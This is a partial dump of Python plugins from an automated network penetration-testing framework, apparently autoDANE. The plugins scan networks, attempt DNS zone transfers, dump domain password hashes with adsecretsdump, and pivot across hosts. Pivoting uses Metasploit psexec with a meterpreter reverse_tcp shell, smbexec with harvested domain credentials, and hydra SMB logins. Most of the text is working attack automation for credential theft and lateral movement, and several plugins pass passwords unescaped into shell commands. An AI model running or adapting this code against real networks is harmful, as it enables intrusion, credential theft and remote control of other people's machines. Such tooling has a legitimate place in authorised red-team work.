33 | cursor = params.db.cursor()
34 | cursor.execute(sql, (params.footprint_id, params.footprint_id, ))
35 | row = cursor.fetchone()
36 | cursor.close()
37 |
38 | if row != None:
39 | cursor = params.db.cursor()
40 | cursor.execute("select addtasklistitem(%s, 21, %s, true, false)", (params.footprint_id, row[0], ))
41 | task_id = cursor.fetchone()[0]
42 | cursor.close()
43 |
44 | delimited_pwd = ""
45 | for c in row[4]:
46 | delimited_pwd += "\\" + c
47 |
48 |
49 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
50 |
51 | cmd = "./software/adsecretsdump.py {}/{}:{}@{} > temp/{}".format(row[2], row[3], delimited_pwd, row[1], temp_file_name)
52 | params.log(cmd)
53 | os.popen(cmd)
54 |
55 | log = os.popen("cat temp/" + temp_file_name).read()
56 |
57 | for i in log.split("\n"):
58 | #if i[-3:] == ":::" and i.lower().find(row[2].lower()) == 0 and i.find("$") == -1:
59 | if i[-3:] == ":::" and i.find("$") == -1:
60 | user = i.split("\\")[1].split(":")[0]
61 | lm_hash = i.split(":")[2]
62 | nt_hash = i.split(":")[3]
63 | print "[{}]\[{}] - [{}:{}]".format(row[2], user, lm_hash, nt_hash)
64 | cursor = params.db.cursor()
65 | cursor.execute("select addDomainCreds(%s, 0, %s, %s, '', %s, %s)", (params.footprint_id, row[2], user, lm_hash, nt_hash, ))
66 | cursor.close()
67 |
68 | spCursor = params.db.cursor()
69 | spCursor.execute("select updatetaskstatus(%s, %s, %s, %s::text)", ( task_id, False, True, base64.b64encode("{}\n\n{}".format(cmd, log)), ))
70 | spCursor.close()
71 |
72 | cursor = params.db.cursor()
73 | cursor.execute("update domains set hashes_extracted = true where id = %s", (row[0], ))
74 | cursor.close()
75 |
76 | cursor = params.db.cursor()
77 | cursor.execute("select executetriggers(%s, %s, 11, '');", (params.footprint_id, row[0], ))
78 | cursor.close()
79 |
80 | #TODO: create and call a trigger called "Domain hashes extracted"
81 | #else:
82 | # params.log("nothing to check")
83 |
--------------------------------------------------------------------------------
/plugins/footprinting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/footprinting/__init__.py
--------------------------------------------------------------------------------
/plugins/footprinting/host_dns_lookup.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | cmd = 'nmap {0} -sL --excludefile temp/exclude_list | grep "Nmap scan report" | grep \( | cut -d \ -f 5'
5 | cursor = params.db.cursor()
6 | cursor.execute("select ip_address from host_data where id = %s", (params.item_identifier, ))
7 | row = cursor.fetchone()
8 | cursor.close()
9 |
10 | params.log(cmd)
11 |
12 | host_name = os.popen(cmd.format(row[0])).read()
13 |
14 | if host_name != "":
15 | cursor = params.db.cursor()
16 | cursor.execute("call addHost(%s, %s, %s)", (params.footprint_id, row[0], host_name, ))
17 | cursor.close()
18 |
--------------------------------------------------------------------------------
/plugins/footprinting/net_range_dns_lookup.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | def run(params):
6 | cursor = params.db.cursor()
7 | cursor.execute("select net_range from net_ranges where id = %s", (params.item_identifier, ))
8 | ip_address = cursor.fetchone()[0]
9 | cursor.close()
10 |
11 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
12 |
13 | cmd = "nmap {0} --excludefile temp/exclude_list -sL -oG temp/{1} -Pn -vv -T {2}".format(ip_address, temp_file_name, params.nmapTiming)
14 | params.log(cmd)
15 | params.log("")
16 | os.popen(cmd)
17 |
18 | for line in open('temp/' + temp_file_name):
19 | if line[:5] == "Host:":
20 | host = line.split(" ")[1]
21 | hostname = line.split("(")[1].split(")")[0]
22 | if hostname != "":
23 | cursor = params.db.cursor()
24 | #cursor.execute("call addHost(%s, %s, %s, 0)", (params.footprint_id, host, hostname, ))
25 | cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, host, hostname, ))
26 | cursor.close()
27 |
28 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
29 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_host.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | def run(params):
6 | cursor = params.db.cursor()
7 | cursor.execute("select ip_address from host_data where id = %s", (params.item_identifier, ))
8 | ip_address = cursor.fetchone()[0]
9 | cursor.close()
10 |
11 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
12 |
13 | ports = ""
14 | cursor = params.db.cursor()
15 | cursor.execute("select port_number from ports_to_scan where type_id = 2")
16 | for row in cursor.fetchall():
17 | ports += str(row[0]) + ","
18 |
19 | ports = ports[:-1]
20 | cursor.close()
21 |
22 | os.popen("nmap {0} --excludefile temp/exclude_list -n -p {1} -oG temp/{2} -Pn -vv".format(ip_address, ports, temp_file_name))
23 |
24 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
25 |
26 | hosts = []
27 | for line in open('temp/' + temp_file_name):
28 | if line[:1] == "#":
29 | continue
30 |
31 | if line.find("Status") == -1:
32 | host = line[6:]
33 | host = host[:host.find(" ")]
34 | hosts.append(host)
35 |
36 | items = line[line.find("Ports")+7:]
37 | for item in items.split(", "):
38 | data = item.split("/")
39 | port = data[0]
40 | status = data[1]
41 | if status == "open":
42 | cursor = params.db.cursor()
43 | cursor.execute("call addPort(%s, %s, %s)", (params.footprint_id, params.item_identifier, port, ))
44 | cursor.close()
45 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_net_range.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | #TODO: write plugin to do dns queries on the ranges as well
6 |
7 | def run(params):
8 | cursor = params.db.cursor()
9 | cursor.execute("select net_range from net_ranges where id = %s", (params.item_identifier, ))
10 | ip_address = cursor.fetchone()[0]
11 | cursor.close()
12 |
13 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
14 |
15 | ports = ""
16 | cursor = params.db.cursor()
17 | cursor.execute("select port_number from ports_to_scan where type_id = 2")
18 | for row in cursor.fetchall():
19 | ports += str(row[0]) + ","
20 |
21 | ports = ports[:-1]
22 | cursor.close()
23 |
24 | #os.popen("nmap {0} --excludefile temp/exclude_list -n -p 21,22,80,135,443,445,1433,3306,3389,5800,5900,8080-8090,9090-9099 -oG temp/{1} -Pn -vv".format(ip_address, temp_file_name))
25 | #os.popen("nmap {0} --excludefile temp/exclude_list -n -p 21,22,80,135,443,445,1433,3306,3389,5800,5900,8080 -oG temp/{1} -Pn -vv".format(ip_address, temp_file_name))
26 | #ports = "80,445,1433,8080"
27 | #ports = "21,22,80,135,443,445,1433,3306,3389,5555,5800,5900,8080"
28 | cmd = "nmap {0} --excludefile temp/exclude_list -n -p {1} -oG temp/{2} -Pn -vv -T {3}".format(ip_address, ports, temp_file_name, params.nmapTiming)
29 | params.log(cmd)
30 | params.log("")
31 | os.popen(cmd)
32 |
33 | hosts = []
34 | for line in open('temp/' + temp_file_name):
35 | if line[:1] == "#":
36 | continue
37 |
38 | if line.find("Status") == -1:
39 | host = line[6:]
40 | host = host[:host.find(" ")]
41 | hosts.append(host)
42 |
43 | items = line[line.find("Ports")+7:]
44 | for item in items.split(", "):
45 | data = item.split("/")
46 | port = data[0]
47 | status = data[1]
48 | if status == "open":
49 | cursor = params.db.cursor()
50 | #cursor.execute("call addHost(%s, %s, '', 0)", (params.footprint_id, host, ))
51 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, host, ))
52 | cursor.close()
53 |
54 | cursor = params.db.cursor()
55 | cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (host, params.footprint_id, ))
56 | host_id = cursor.fetchone()[0]
57 | cursor.close()
58 |
59 | cursor = params.db.cursor()
60 | #cursor.execute("call addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
61 | cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
62 | cursor.close()
63 |
64 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
65 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_scoped_host.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | def run(params):
6 | cursor = params.db.cursor()
7 | cursor.execute("select item_value from scope where id = %s", (params.item_identifier, ))
8 | ip_address = cursor.fetchone()[0]
9 | cursor.close()
10 |
11 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
12 |
13 | ports = ""
14 | cursor = params.db.cursor()
15 | cursor.execute("select port_number from ports_to_scan where type_id = 2")
16 | for row in cursor.fetchall():
17 | ports += str(row[0]) + ","
18 |
19 | ports = ports[:-1]
20 | cursor.close()
21 |
22 | cmd = "nmap {0} --excludefile temp/exclude_list -n -p {1} -oG temp/{2} -Pn -vv -T {3}".format(ip_address, ports, temp_file_name, params.nmapTiming)
23 | os.popen(cmd)
24 | params.log(cmd)
25 | params.log("")
26 |
27 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
28 |
29 | hosts = []
30 | hostAdded = False
31 | host_id = 0
32 | for line in open('temp/' + temp_file_name):
33 | if line[:1] == "#":
34 | continue
35 |
36 | if line.find("Status") == -1:
37 | host = line[6:]
38 | host = host[:host.find(" ")]
39 | hosts.append(host)
40 |
41 | items = line[line.find("Ports")+7:]
42 | for item in items.split(", "):
43 | data = item.split("/")
44 | port = data[0]
45 | status = data[1]
46 | if status == "open":
47 | if hostAdded == False:
48 | cursor = params.db.cursor()
49 | #cursor.execute("call addHost(%s, %s, '', 0)", (params.footprint_id, host, ))
50 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, host, ))
51 | cursor.close()
52 |
53 | cursor = params.db.cursor()
54 | cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (host, params.footprint_id, ))
55 | host_id = cursor.fetchone()[0]
56 | cursor.close()
57 | hostAdded = True
58 |
59 | cursor = params.db.cursor()
60 | #cursor.execute("call addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
61 | cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
62 | cursor.close()
63 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_scoped_range.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | def run(params):
6 | cursor = params.db.cursor()
7 | cursor.execute("select item_value from scope where id = %s", (params.item_identifier, ))
8 | ip_address = cursor.fetchone()[0]
9 | cursor.close()
10 |
11 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
12 |
13 | ports = ""
14 | cursor = params.db.cursor()
15 | cursor.execute("select port_number from ports_to_scan where type_id = 1")
16 | for row in cursor.fetchall():
17 | ports += str(row[0]) + ","
18 |
19 | ports = ports[:-1]
20 | cursor.close()
21 |
22 | #os.popen("nmap {0} --excludefile temp/exclude_list -n -p 21,22,80,135,443,445,1433,3306,3389,5800,5900,8080-8090,9090-9099 -oG temp/{1} -Pn -vv".format(ip_address, temp_file_name))
23 | cmd = "nmap {0} --excludefile temp/exclude_list -n -p {1} -oG temp/{2} -Pn -vv -T {3}".format(ip_address, ports, temp_file_name, params.nmapTiming)
24 | os.popen(cmd)
25 |
26 | #params.log(cmd)
27 | #os.popen("nmap {0} --excludefile temp/exclude_list -n -p {1} -oG temp/{2} -Pn -vv -T {3}".format(ip_address, ports, temp_file_name, params.nmapTiming))
28 |
29 | hosts = []
30 | for line in open('temp/' + temp_file_name):
31 | if line[:1] == "#":
32 | continue
33 |
34 | if line.find("Status") == -1:
35 | host = line[6:]
36 | host = host[:host.find(" ")]
37 | hosts.append(host)
38 |
39 | items = line[line.find("Ports")+7:]
40 | for item in items.split(", "):
41 | data = item.split("/")
42 | port = data[0]
43 | status = data[1]
44 | if status == "open":
45 | cursor = params.db.cursor()
46 | #cursor.execute("call addHost(%s, %s, '', 0)", (params.footprint_id, host, ))
47 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, host, ))
48 | cursor.close()
49 |
50 | cursor = params.db.cursor()
51 | cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (host, params.footprint_id, ))
52 | host_id = cursor.fetchone()[0]
53 | cursor.close()
54 |
55 | cursor = params.db.cursor()
56 | #cursor.execute("call addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
57 | cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
58 | cursor.close()
59 | #print "found open port: {0} : {1}".format(host, port)
60 | #params.log("found open port: {0} : {1}".format(host, port))
61 |
62 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
63 |
--------------------------------------------------------------------------------
/plugins/footprinting/query_mssql_discovery_service.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 | import socket
5 |
6 | def run(params):
7 | cursor = params.db.cursor()
8 | cursor.execute("select net_range from net_ranges where id = %s", (params.item_identifier, ))
9 | net_range = cursor.fetchone()[0]
10 | cursor.close()
11 |
12 | params.log("Check for instances of the MS SQL Server Discovery service in {}".format(net_range))
13 | params.log("")
14 |
15 | net_range = net_range.replace("0/24", "")
16 |
17 | for o in range(256):
18 | try:
19 | ip = "{}{}".format(net_range, o)
20 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
21 | sock.settimeout(0.5)
22 | sock.sendto("\x02\x41\x41\x41\x41", (ip, 1434))
23 | val = sock.recv(4096)
24 | port = int(val.split(";")[9])
25 | params.log(" {}:{}".format(ip, port))
26 |
27 | cursor = params.db.cursor()
28 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip, ))
29 | cursor.close()
30 |
31 | cursor = params.db.cursor()
32 | cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (ip, params.footprint_id, ))
33 | host_id = cursor.fetchone()[0]
34 | cursor.close()
35 |
36 | cursor = params.db.cursor()
37 | cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
38 | cursor.close()
39 |
40 | cursor = params.db.cursor()
41 | cursor.execute("select id from port_data where host_data_id = %s and port_number = %s", (host_id, port, ))
42 | port_id = cursor.fetchone()[0]
43 | cursor.close()
44 |
45 | cursor = params.db.cursor()
46 | cursor.execute("select executetriggers(%s, %s, %s, %s)", (params.footprint_id, port_id, 12, str(port), ))
47 | cursor.close()
48 |
49 | except:
50 | continue
51 |
--------------------------------------------------------------------------------
/plugins/footprinting/scoped_range_dns_lookup.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | def run(params):
6 | cursor = params.db.cursor()
7 | cursor.execute("select item_value from scope where id = %s", (params.item_identifier, ))
8 | ip_address = cursor.fetchone()[0]
9 | cursor.close()
10 |
11 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
12 |
13 | cmd = "nmap {0} --excludefile temp/exclude_list -sL -oG temp/{1} -Pn -vv -T {2}".format(ip_address, temp_file_name, params.nmapTiming)
14 | params.log(cmd)
15 | params.log("")
16 | os.popen(cmd)
17 |
18 | for line in open('temp/' + temp_file_name):
19 | if line[:5] == "Host:":
20 | host = line.split(" ")[1]
21 | hostname = line.split("(")[1].split(")")[0]
22 | if hostname != "":
23 | cursor = params.db.cursor()
24 | cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, host, hostname, ))
25 | cursor.close()
26 |
27 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
28 |
--------------------------------------------------------------------------------
/plugins/footprinting/screenshot_website.py:
--------------------------------------------------------------------------------
1 | import os
2 | import psycopg2
3 |
4 | def run(params):
5 | cursor = params.db.cursor()
6 | cursor.execute("select hd.id, hd.ip_address, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
7 | row = cursor.fetchone()
8 | cursor.close()
9 |
10 | host = row[1]
11 | port = row[2]
12 |
13 | protocol = "http"
14 | if port in [443, 8443]:
15 | protocol = "https"
16 |
17 | #print "screenshot site at {0}://{1}:{2}/".format(protocol, host, port)
18 | #params.log("screenshot site at {0}://{1}:{2}/".format(protocol, host, port))
19 |
20 | cmd = 'curl -m 60 -s -k --location {0}://{1}:{2}/'.format(protocol, host, port)
21 | html = os.popen(cmd).read()
22 | try:
23 | params.log(cmd)
24 |
25 | html.decode('utf-8')
26 |
27 | title = ""
28 | if html.find(" -1:
29 | title = html[html.find("")+1:]
31 | title = title[:title.find("")]
32 | title = title.replace("\n", "").strip()
33 | elif html.find(" -1:
34 | title = html[html.find("")+1:]
36 | title = title[:title.find("")]
37 | title = title.replace("\n", "").strip()
38 | elif html.find(" -1:
39 | title = html[html.find("")+1:]
41 | title = title[:title.find("")]
42 | title = title.replace("\n", "").strip()
43 | elif html.find("<") == -1:
44 | title = html
45 | title = title.replace("\n", "").strip()
46 | elif html == "":
47 | title = ""
48 | else:
49 | title = ""
50 |
51 | params.log("the title is {0}".format(title))
52 | params.log("")
53 |
54 | filename = "temp/{0}.jpg".format(params.getRandomFileName())
55 | cmd = "timeout 60 wkhtmltoimage --load-error-handling ignore -q {0}://{1}:{2}/ {3}".format(protocol, host, port, filename)
56 | os.popen(cmd)
57 | params.log(cmd)
58 |
59 | image_b64 = os.popen("cat {} | base64".format(filename)).read()
60 |
61 |
62 |
63 | #print "title:[{}] body:[{}]".format(title, html)
64 |
65 | cursor = params.db.cursor()
66 | cursor.execute("select addWebsite(%s::int, %s::varchar, %s::text, %s::text)", (params.item_identifier, str(title), str(html), image_b64, ))
67 | cursor.close()
68 | except:
69 | print "service is hosting unreadable content"
70 | # print image_b64
71 |
72 | #image = None
73 | #try:
74 | # with open(filename, 'r') as f:
75 | # image = f.read()
76 | #except:
77 | # pass
78 |
79 | #cursor = params.db.cursor()
80 | #cursor.execute("select addWebsite(%s, %s, %s, %s)", (params.item_identifier, title, html, psycopg2.Binary(image), ))
81 | #cursor.close()
82 |
--------------------------------------------------------------------------------
/plugins/host_enumeration/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/host_enumeration/__init__.py
--------------------------------------------------------------------------------
/plugins/host_enumeration/add_local_ip.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | #TODO: get interface from the "Advanced Options" tab you're going to add
5 | ip_address = os.popen('ifconfig ' + str(params.networkInterface) + ' | grep "inet addr" | cut -d \: -f 2 | cut -d \ -f 1').read()[:-1]
6 |
7 | params.log("local ip address {0}. adding to db".format(ip_address))
8 |
9 | cursor = params.db.cursor()
10 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_address, ))
11 | cursor.close()
12 |
--------------------------------------------------------------------------------
/plugins/host_enumeration/add_local_nameservers.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 |
5 | try:
6 | #cmd = "host `cat /etc/resolv.conf | grep search | cut -d \ -f 2` | cut -d \ -f 4"
7 | cmd = "host `cat /etc/resolv.conf | grep search | cut -d \ -f 2` | grep address | cut -d \ -f 4"
8 | params.log(cmd)
9 | params.log("")
10 | for ip_address in os.popen(cmd).read().split("\n"):
11 | if ip_address != "":
12 | cursor = params.db.cursor()
13 | #cursor.execute("call addHost(%s, %s, '', 0)", (params.footprint_id, ip_address, ))
14 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_address, ))
15 | cursor.close()
16 | except:
17 | pass
18 |
19 | try:
20 | cmd = "cat /etc/resolv.conf | grep nameserver | cut -d \ -f 2"
21 | params.log(cmd)
22 | params.log("")
23 | for ip_address in os.popen(cmd).read().split("\n"):
24 | if ip_address != "":
25 | if ip_address[:3] != "127":
26 | cursor = params.db.cursor()
27 | #cursor.execute("call addHost(%s, %s, '', 0)", (params.footprint_id, ip_address, ))
28 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_address, ))
29 | cursor.close()
30 | except:
31 | pass
32 |
33 | # try:
34 | # cmd = "cat /etc/resolv.conf | grep search | cut -d \ -f 2"
35 | # params.log(cmd)
36 | # params.log("")
37 | # resolver = os.popen(cmd).read()[:-1]
38 | # params.log(resolver)
39 | # params.log("")
40 | #
41 | # cmd = "host {0} | grep address | cut -d \ -f 4".format(resolver)
42 | # params.log(cmd)
43 | # params.log("")
44 | # resolvers = os.popen(cmd).read()[:-1].split("\n")
45 | # params.log(resolvers)
46 | # params.log("")
47 | #
48 | # for r in resolvers:
49 | # cursor = params.db.cursor()
50 | # cursor.execute("call addHost(%s, %s, '', 1)", (params.footprint_id, r, ))
51 | # cursor.close()
52 | # except:
53 | # pass
54 |
--------------------------------------------------------------------------------
/plugins/host_enumeration/zone_transfer_assigned_domain.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | def run(params):
6 | for domain in os.popen('cat /etc/resolv.conf | grep search | cut -d \ -f 2').read().split("\n"):
7 | if domain != "":
8 | print "found domain [{}]".format(domain)
9 | temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
10 | cmd = "for i in `host {} | grep address | grep -v IPv6 | cut -d \ -f 4 | sort -u`; do timeout 2 dig axfr {} $i; done > temp/{}"
11 | os.popen(cmd.format(domain, domain, temp_file_name))
12 | #os.popen("dig axfr {} > temp/{}".format(domain, temp_file_name))
13 |
14 | #temp_file_name = "D2YJF4"
15 | for l in open("temp/{}".format(temp_file_name)):
16 | l = l[:-1]
17 | #print "[{}][{}]".format(l, l.find("\t"))
18 | if l.find("\tA\t") > -1:
19 | ip_addr = l[::-1].split("\t")[0][::-1]
20 | #print "A\t[{}] [{}]".format(l, ip_addr)
21 |
22 | cursor = params.db.cursor()
23 | cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_addr, ))
24 | cursor.close()
25 |
26 | #continue
27 | elif l.find("\tNS\t") > -1:
28 | host_name = l[::-1].split("\t")[0][::-1][:-1]
29 | ip_addr = os.popen("host {} | grep address | cut -d \ -f 4".format(host_name)).read()[:-1]
30 | #print "NS\t[{}] [{}] [{}]".format(l, host_name, ip_addr)
31 |
32 | cursor = params.db.cursor()
33 | cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, ip_addr, host_name, ))
34 | cursor.close()
35 |
36 | #continue
37 | elif l.find("CNAME") > -1:
38 | host_name = l.split("CNAME")[1].strip()[:-1]
39 | ip_addr = os.popen("host {} | grep address | cut -d \ -f 4".format(host_name)).read()[:-1]
40 | #print "CNAME\t[{}] [{}] [{}]".format(l, host_name, ip_addr)
41 |
42 | cursor = params.db.cursor()
43 | cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, ip_addr, host_name, ))
44 | cursor.close()
45 |
46 | #continue
47 | elif l.find("\tMX\t") > -1:
48 | host_name = l.split("MX")[1].strip()[:-1].split(" ")[1]
49 | ip_addr = os.popen("host {} | grep address | cut -d \ -f 4".format(host_name)).read()[:-1]
50 | #print "MX\t[{}] [{}] [{}]".format(l, host_name, ip_addr)
51 |
52 | cursor = params.db.cursor()
53 | cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, ip_addr, host_name, ))
54 | cursor.close()
55 |
56 | #continue
57 | else:
58 | #print "?\t{}".format(l)
59 | continue
60 | #for ip_address in os.popen("cat temp/" + temp_file_name + " | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'").read().split("\n"):
61 | # if ip_address != "":
62 | # print " adding ip address {}".format(ip_address)
63 | # cursor = params.db.cursor()
64 | # cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip_address, ))
65 | # cursor.close()
66 |
67 | params.log(os.popen("cat temp/{0}".format(temp_file_name)).read())
68 |
69 |
--------------------------------------------------------------------------------
/plugins/pivoting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/pivoting/__init__.py
--------------------------------------------------------------------------------
/plugins/pivoting/psexec_local_account.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
4 | def run(params):
5 | sql = "select hd.ip_address, lc.username, lc.cleartext_password, hd.id from host_data hd join local_credentials lc on hd.id = lc.host_data_id where lc.id = %s and lc.cleartext_password != ''"
6 | cursor = params.db.cursor()
7 | cursor.execute(sql, (params.item_identifier, ))
8 | row = cursor.fetchone()
9 | #print "log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2])
10 | #params.log("log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2]))
11 | cursor.close()
12 |
13 | setup = [
14 | "use exploit/windows/smb/psexec",
15 | "set PAYLOAD windows/meterpreter/reverse_tcp",
16 | "set RHOST {0}".format(row[0]),
17 | "set LHOST {0}".format(params.getLocalHost()),
18 | "set LPORT {0}".format(params.getOpenPort()),
19 | "set smbuser {0}".format(row[1]),
20 | "set smbpass {0}".format(row[2]),
21 | "exploit"
22 | ]
23 |
24 | log = ""
25 | for l in exploit.runMsf(params, row[3], setup, "psexec"):
26 | log = log + l + "\r\n"
27 | params.log(l)
28 |
29 | cursor = params.db.cursor()
30 | cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[3], 4, base64.b64encode(log), ))
31 | cursor.close()
32 |
--------------------------------------------------------------------------------
/plugins/pivoting/retry_domain_accounts.py:
--------------------------------------------------------------------------------
1 | import os
2 | import base64
3 |
4 |
5 | def run(params):
6 | # sql = """select getDomainCredsToRetry(%s)"""
7 | sql = """
8 | SELECT
9 | (f).host_data_id,
10 | (f).ip_address,
11 | (f).domain_creds_id,
12 | (f).domain,
13 | (f).username,
14 | (f).cleartext_password
15 | FROM (select getdomaincredstoretry(%s) AS f) x;
16 | """
17 |
18 | cursor = params.db.cursor()
19 | cursor.execute(sql, (params.footprint_id, ))
20 | row = cursor.fetchone()
21 | cursor.close()
22 | # TODO: delimit password, else funny characters might cause the command to
23 | # fail
24 |
25 | if row is not None:
26 | cursor = params.db.cursor()
27 | cursor.execute("select addTaskListItem(%s, 16, %s, true, false)",
28 | (params.footprint_id, row[2], ))
29 | task_id = cursor.fetchone()[0]
30 | cursor.close()
31 |
32 | host_id = row[0]
33 | ip_address = row[1]
34 | domain_creds_id = row[2]
35 | domain = row[3]
36 | username = row[4]
37 | cleartext_password = row[5]
38 |
39 | delimited_pwd = ""
40 | for c in cleartext_password:
41 | delimited_pwd = delimited_pwd + "\{}".format(c)
42 |
43 | output_file_name = "temp/" + params.getRandomFileName()
44 | # cmd = "timeout -s 2 3 smbexec.py {0}/{1}:{2}@{3} 445/SMB > {4}".format(domain, username, delimited_pwd, ip_address, output_file_name)
45 | cmd = "echo exit | timeout 10 smbexec.py {0}/{1}:{2}@{3} 445/SMB > {4}".format(
46 | domain, username, delimited_pwd, ip_address, output_file_name)
47 | params.log(cmd.split(">")[0])
48 | params.log("")
49 | os.popen(cmd)
50 | params.log(os.popen("cat {0}".format(output_file_name)).read())
51 | res = os.popen(
52 | "cat {0} | grep semi-interactive | wc -l".format(output_file_name)).read()[:-1]
53 |
54 | if res.find("STATUS_OBJECT_NAME_NOT_FOUND") == -1:
55 | cursorb = params.db.cursor()
56 | cursorb.execute("select addToDomainCredentialsMap(%s, %s, %s, %s)", (params.footprint_id, host_id, domain_creds_id, int(res) == 1, ))
57 | cursorb.close()
58 | # else do the job again.
59 |
60 | final_output = ""
61 | while not params.log_queue.empty():
62 | final_output += "{0}\r\n".format(params.log_queue.get(False))
63 | final_output = final_output[:-2]
64 |
65 | spCursor = params.db.cursor()
66 | spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", (task_id, False, True, base64.b64encode(final_output), ))
67 | spCursor.close()
68 |
--------------------------------------------------------------------------------
/plugins/pivoting/retry_local_accounts.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | sql = """
5 | select
6 | hd.id,
7 | lc.id,
8 | hd.ip_address,
9 | lc.username,
10 | lc.cleartext_password
11 | from
12 | host_data hd,
13 | port_data pd,
14 | local_credentials lc
15 | where
16 | hd.id = pd.host_data_id and
17 | pd.port_number = 445 and
18 | lc.cleartext_password != '' and
19 | #exclude credentials that have been tried prviously
20 | (hd.ip_address, lc.username, lc.cleartext_password) not in (select hd.ip_address, lc.username, lc.cleartext_password from host_data hd join port_data pd on hd.id = pd.host_data_id join local_credentials_map m on hd.id = m.host_data_id join local_credentials lc on lc.id = m.local_credentials_id where hd.footprint_id = 1 and pd.port_number = 445) and
21 | #exclude hosts that have valid creds with the same username, regardless of the password
22 | (hd.ip_address, lc.username) not in (select hd.ip_address, lc.username from host_data hd join port_data pd on hd.id = pd.host_data_id join local_credentials_map m on hd.id = m.host_data_id join local_credentials lc on lc.id = m.local_credentials_id where hd.footprint_id = %s and pd.port_number = 445 and m.valid = 1)"""
23 |
24 | cursor = params.db.cursor()
25 | cursor.execute(sql, (params.footprint_id, ))
26 |
27 | row = cursor.fetchone()
28 | cursor.close()
29 | #TODO: delimit password, else funny characters might cause the command to fail
30 |
31 | if row != None:
32 | #TODO: modify to be the same as the domain accounts plugin
33 |
34 | cmd = "hydra -l {1} -p {2} {0} smb >&1 | grep \"1 valid password found\" | wc -l".format(row[2], row[3], row[4])
35 | params.log(cmd)
36 | params.log("")
37 | res = os.popen(cmd).read()[:-1]
38 | params.log(res)
39 |
